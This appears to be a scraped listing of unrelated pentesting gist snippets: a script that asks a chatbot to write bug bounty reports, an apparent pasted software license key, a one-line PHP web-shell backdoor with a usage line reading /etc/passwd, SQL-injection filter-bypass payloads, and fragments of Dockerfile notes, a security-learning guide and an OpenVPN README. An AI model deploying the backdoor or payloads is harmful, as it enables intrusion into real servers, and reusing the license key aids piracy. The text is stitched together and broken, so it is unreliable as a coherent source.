Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
import poe, sys | |
client = poe.Client("<POE_API_KEY_HERE>") | |
title=sys.argv[1] | |
path=sys.argv[2] | |
more="" | |
if len(sys.argv) > 3: | |
more="\" and here is more information: "+sys.argv[3] | |
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
—– BEGIN LICENSE —– | |
Mifeng User | |
Single User License | |
EA7E-1184812 | |
C0DAA9CD 6BE825B5 FF935692 1750523A | |
EDF59D3F A3BD6C96 F8D33866 3F1CCCEA | |
1C25BE4D 25B1C4CC 5110C20E 5246CC42 | |
D232C83B C99CCC42 0E32890C B6CBF018 | |
B1D4C178 2F9DDB16 ABAA74E5 95304BEF | |
9D0CCFA9 8AF8F8E2 1E0A955E 4771A576 |
<!-- Simple PHP Backdoor By DK (One-Liner Version) --> | |
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> | |
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> |
[~] order by [~] | |
/**/ORDER/**/BY/**/ | |
/*!order*/+/*!by*/ | |
/*!ORDER BY*/ | |
/*!50000ORDER BY*/ | |
/*!50000ORDER*//**//*!50000BY*/ | |
/*!12345ORDER*/+/*!BY*/ | |
[~] UNION select [~] |
#!/usr/bin/env python3 | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
see: https://gist.github.com/UniIsland/3346170 | |
""" | |
Set the base image to Ubuntu must be first instruction - use docker search to find images
FROM ubuntu # <image>
FROM ubuntu:latest # - <image>:<tag>
FROM ubuntu:precise (LTS)
Set the maintainer info
This is an opinionated guide to learning about computer security (independently of a university or training program), starting with the absolute basics (suitable for someone without any exposure to or knowledge of computer security) and moving into progressively more difficult subject matter.
It seems that most people don't realize how much information is actually available on the internet. People love to share (especially geeks) and everything you need to become well versed in computer security is already available to you (and mostly for free). However, sometimes knowing where to start is the hardest part - which is the problem that this guide is intended to address. Therefore, this guide can accuratley be described as a 'guide to guides', with additional recommendations on effective learning and execises, based on my own experiences.
Many of the free resources are the best resources and this guide focuses on them. It is intended to provided a comprehensive
This python script is intended to automate the extraction of embedded certificates and keys from OpenVPN config files.
Unfortunately the GNOME Network-Manager is not able to automatically import OpenVPN config files with embedded certificates and keys. A workaround is to manually extract these and store them in separate files (e.g. see https://naveensnayak.wordpress.com/2013/03/04/ubuntu-openvpn-with-ovpn-file/).
Instructions:
-
Make shure all the required packages are installed. For example on Ubuntu and Debian run:
$ sudo apt-get install python3 network-manager-openvpn-gnome